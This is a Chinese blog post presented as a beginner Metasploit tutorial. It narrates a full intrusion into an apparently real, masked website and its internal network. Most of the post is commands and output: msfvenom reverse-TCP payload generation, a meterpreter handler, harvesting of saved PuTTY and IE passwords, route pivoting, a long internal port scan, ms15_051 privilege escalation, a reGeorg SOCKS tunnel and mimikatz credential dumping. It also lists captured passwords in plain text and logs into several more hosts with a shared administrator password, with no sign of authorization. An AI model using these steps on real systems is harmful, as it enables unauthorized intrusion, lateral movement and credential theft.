欢迎光临
我们一直在努力
"

Metasploit完整渗透 初级教学

在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell

首先用Metasploit生成反弹马,也就是生成反弹的payload:
成功生成反弹型payload:
(1)生成win下的exe
msfvenom -a x86 –platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)生成win下的aspx
msfvenom -a x86 –platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的生成payload 的方法见:http://netsec.ws/?p=331

(3)我生成一个aspx的反弹马

然后启动msfconsole

(4)
本地监听,反弹后的控制端:use exploit/multi/handler

(5)
本地监听的确定用哪个payload:
set payload windows/meterpreter/reverse_tcp

(6)
设置本地监听的端口:
set lport 7788

(7)
设置本地的监听的地址:
set lhost 0.0.0.0

(8)
运行:
run

(9)访问生成的反弹马:
http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

2016013121400939424
(10)
meterpreter查看路由:

run get_local_subnets

(11)
meterpreter 寻找putty保存的信息
run enum_putty

(12)meterpreter 寻找ie保存的密码
run post/windows/gather/enum_ie

(13)
meterpreter运行cmd

shell

退出cmd shell 为:ctrl+c
2016013121403047247
(14)
把meterpreter放入后台:
background

(15)
添加路由(这样才能进行内网的扫描):
route add 192.168.0.0 255.255.255.0 1
route add的第一个参数是地址,第二个参数地址是掩码,第三个参数是sessis的id

2016013121414361178
(16)

进行内网的主机扫描:利用smb进行主机识别:
use auxiliary/scanner/smb/smb_version

先看看这个模块需要哪些参数

show options
2016013121421282394
设置rhost

set rhosts 192.168.0.0/24

设置线程:
set threads 50

run
得到结果:
2016013121424969651
(17)扫描端口:

use auxiliary/scanner/portscan/tcp

设置扫描的范围:

set rhosts 192.168.0.0/24

设置扫描的端口:
set ports 22,23,21,3389,1433,80,8080,81,82

设置线程:
set threads 50

运行:
run

运行结果:

[*] 192.168.0.7:23 – TCP OPEN
[*] 192.168.0.7:80 – TCP OPEN
[*] 192.168.0.18:3389 – TCP OPEN
[*] 192.168.0.9:80 – TCP OPEN
[*] 192.168.0.9:23 – TCP OPEN
[*] 192.168.0.18:1433 – TCP OPEN
[*] 192.168.0.5:23 – TCP OPEN
[*] 192.168.0.4:23 – TCP OPEN
[*] 192.168.0.4:80 – TCP OPEN
[*] 192.168.0.6:80 – TCP OPEN
[*] 192.168.0.5:80 – TCP OPEN
[*] 192.168.0.6:23 – TCP OPEN
[*] Scanned  30 of 256 hosts (11% complete)
[*] 192.168.0.55:3389 – TCP OPEN
[*] 192.168.0.88:3389 – TCP OPEN
[*] 192.168.0.88:1433 – TCP OPEN
[*] 192.168.0.88:80 – TCP OPEN
[*] Scanned  73 of 256 hosts (28% complete)
[*] Scanned  81 of 256 hosts (31% complete)
[*] 192.168.0.120:80 – TCP OPEN
[*] 192.168.0.127:1433 – TCP OPEN
[*] 192.168.0.129:1433 – TCP OPEN
[*] 192.168.0.128:22 – TCP OPEN
[*] 192.168.0.129:80 – TCP OPEN
[*] 192.168.0.130:1433 – TCP OPEN
[*] 192.168.0.130:3389 – TCP OPEN
[*] 192.168.0.127:3389 – TCP OPEN
[*] 192.168.0.128:80 – TCP OPEN
[*] 192.168.0.135:8080 – TCP OPEN
[*] 192.168.0.129:3389 – TCP OPEN
[*] 192.168.0.130:8080 – TCP OPEN
[*] 192.168.0.134:3389 – TCP OPEN
[*] 192.168.0.135:3389 – TCP OPEN
[*] 192.168.0.135:1433 – TCP OPEN
[*] 192.168.0.131:1433 – TCP OPEN
[*] 192.168.0.135:80 – TCP OPEN
[*] 192.168.0.131:80 – TCP OPEN
[*] 192.168.0.139:80 – TCP OPEN
[*] 192.168.0.131:3389 – TCP OPEN
[*] 192.168.0.136:80 – TCP OPEN
[*] 192.168.0.139:1433 – TCP OPEN
[*] 192.168.0.136:8080 – TCP OPEN
[*] 192.168.0.136:3389 – TCP OPEN
[*] 192.168.0.136:1433 – TCP OPEN
[*] 192.168.0.139:3389 – TCP OPEN
[*] 192.168.0.139:8080 – TCP OPEN
[*] 192.168.0.120:22 – TCP OPEN
[*] Scanned 111 of 256 hosts (43% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] 192.168.0.155:22 – TCP OPEN
[*] 192.168.0.160:1433 – TCP OPEN
[*] 192.168.0.160:21 – TCP OPEN
[*] 192.168.0.160:82 – TCP OPEN
[*] 192.168.0.160:22 – TCP OPEN
[*] 192.168.0.161:8080 – TCP OPEN
[*] 192.168.0.160:3389 – TCP OPEN
[*] 192.168.0.160:80 – TCP OPEN
[*] 192.168.0.175:80 – TCP OPEN
[*] 192.168.0.172:80 – TCP OPEN
[*] 192.168.0.172:82 – TCP OPEN
[*] 192.168.0.161:22 – TCP OPEN
[*] 192.168.0.161:80 – TCP OPEN
[*] 192.168.0.175:1433 – TCP OPEN
[*] 192.168.0.175:3389 – TCP OPEN
[*] 192.168.0.172:3389 – TCP OPEN
[*] 192.168.0.170:1433 – TCP OPEN
[*] 192.168.0.176:3389 – TCP OPEN
[*] 192.168.0.176:1433 – TCP OPEN
[*] 192.168.0.178:3389 – TCP OPEN
[*] 192.168.0.176:80 – TCP OPEN
[*] 192.168.0.177:1433 – TCP OPEN
[*] 192.168.0.178:1433 – TCP OPEN
[*] 192.168.0.170:80 – TCP OPEN
[*] 192.168.0.174:3389 – TCP OPEN
[*] 192.168.0.177:3389 – TCP OPEN
[*] 192.168.0.181:80 – TCP OPEN
[*] 192.168.0.181:3389 – TCP OPEN
[*] 192.168.0.174:80 – TCP OPEN
[*] 192.168.0.181:1433 – TCP OPEN
[*] 192.168.0.179:3389 – TCP OPEN
[*] 192.168.0.179:1433 – TCP OPEN
[*] 192.168.0.182:3389 – TCP OPEN
[*] 192.168.0.182:80 – TCP OPEN
[*] 192.168.0.185:3389 – TCP OPEN
[*] 192.168.0.185:1433 – TCP OPEN
[*] 192.168.0.189:80 – TCP OPEN
[*] 192.168.0.189:21 – TCP OPEN
[*] 192.168.0.189:22 – TCP OPEN
[*] 192.168.0.185:80 – TCP OPEN
[*] 192.168.0.189:8080 – TCP OPEN
[*] 192.168.0.189:3389 – TCP OPEN
[*] 192.168.0.191:80 – TCP OPEN
[*] 192.168.0.188:3389 – TCP OPEN
[*] 192.168.0.189:1433 – TCP OPEN
[*] 192.168.0.151:22 – TCP OPEN
[*] 192.168.0.170:3389 – TCP OPEN
[*] 192.168.0.181:8080 – TCP OPEN
[*] 192.168.0.179:80 – TCP OPEN
[*] 192.168.0.191:3389 – TCP OPEN
[*] Scanned 172 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.0.200:80 – TCP OPEN
[*] 192.168.0.201:22 – TCP OPEN
[*] 192.168.0.202:22 – TCP OPEN
[*] 192.168.0.203:8080 – TCP OPEN
[*] 192.168.0.206:22 – TCP OPEN
[*] 192.168.0.205:3389 – TCP OPEN
[*] 192.168.0.204:22 – TCP OPEN
[*] 192.168.0.216:22 – TCP OPEN
[*] 192.168.0.215:3389 – TCP OPEN
[*] 192.168.0.203:80 – TCP OPEN
[*] 192.168.0.218:80 – TCP OPEN
[*] 192.168.0.230:22 – TCP OPEN
[*] 192.168.0.233:8080 – TCP OPEN
[*] 192.168.0.237:3389 – TCP OPEN
[*] 192.168.0.231:22 – TCP OPEN
[*] 192.168.0.225:8080 – TCP OPEN
[*] 192.168.0.226:22 – TCP OPEN
[*] 192.168.0.225:22 – TCP OPEN
[*] 192.168.0.227:8080 – TCP OPEN
[*] 192.168.0.232:22 – TCP OPEN
[*] 192.168.0.236:22 – TCP OPEN
[*] 192.168.0.229:22 – TCP OPEN
[*] 192.168.0.223:22 – TCP OPEN
[*] 192.168.0.234:22 – TCP OPEN
[*] 192.168.0.235:3389 – TCP OPEN
[*] 192.168.0.205:80 – TCP OPEN
[*] 192.168.0.203:22 – TCP OPEN
[*] 192.168.0.207:22 – TCP OPEN
[*] 192.168.0.227:80 – TCP OPEN
[*] 192.168.0.224:22 – TCP OPEN
[*] 192.168.0.235:1433 – TCP OPEN
[*] 192.168.0.233:22 – TCP OPEN
[*] 192.168.0.235:80 – TCP OPEN
[*] Scanned 226 of 256 hosts (88% complete)
[*] 192.168.0.238:80 – TCP OPEN
[*] 192.168.0.239:80 – TCP OPEN
[*] 192.168.0.242:80 – TCP OPEN
[*] 192.168.0.243:80 – TCP OPEN
[*] 192.168.0.241:80 – TCP OPEN
[*] 192.168.0.240:80 – TCP OPEN
[*] 192.168.0.253:23 – TCP OPEN
[*] 192.168.0.253:80 – TCP OPEN
[*] 192.168.0.254:23 – TCP OPEN
[*] 192.168.0.252:80 – TCP OPEN
[*] 192.168.0.252:23 – TCP OPEN
[*] 192.168.0.254:80 – TCP OPEN
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

在局域网里面寻找匿名ftp:
use auxiliary/scanner/ftp/anonymous

设置ip段:
set rhosts 192.168.0.0/24

设置线程:
set threads 50

运行结果:
2016013121432824242

在webshell 里面
查看权限:

whoami

权限很高:

2016013121435969425

如果权限低,则查看systeminfo

主要看里面打的补丁:

2016013121442330933

补丁没有打,所以可以用ms15_051 这个exp秒掉

然后

添加一个账户

2016013121444145118
然后上reGeorg

上传:

tunnel.aspx

然后:
访问:

http:xxx.xxx.xxx.xx/tunnel.aspx
然后发现:
Georg says, ‘All seems fine’证明可以使用:

然后:
python reGeorgSocksProxy.py -p 1090 -u http://xxx.xxx.xxx.xxx/download/tunnel.aspx

然后用proxychains访问远程桌面:

proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1

2016013121450152606

然后上传猕猴桃把密码搞出来:

2016013121453042480

然后用管理员的账户登陆上去:

2016013121454530159

然后开远程登陆记录,发现管理员用远程登陆记住了192.168.0.136的密码:

登陆上去,然后脱下来本机密码:

2016013121464733141

截获一个密码是通用密码:

administraror

xseries_ellassay

登陆开了3389的主机

首先:

192.168.0.160

2016013121470311700

然后:

192.168.0.170

用户名:xz
密码:xz

2016013121472979638
用通用密码登陆192.168.0.181

2016013121475466204

然后通用密码登陆192.168.0.170:

2016013121491687421

转载请注明: 转载自Legend‘s BLog

本文链接地址: Metasploit完整渗透 初级教学



未经允许不得转载:Legend‘s BLog » Metasploit完整渗透 初级教学

分享到:更多 ()

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

无觅相关文章插件,快速提升流量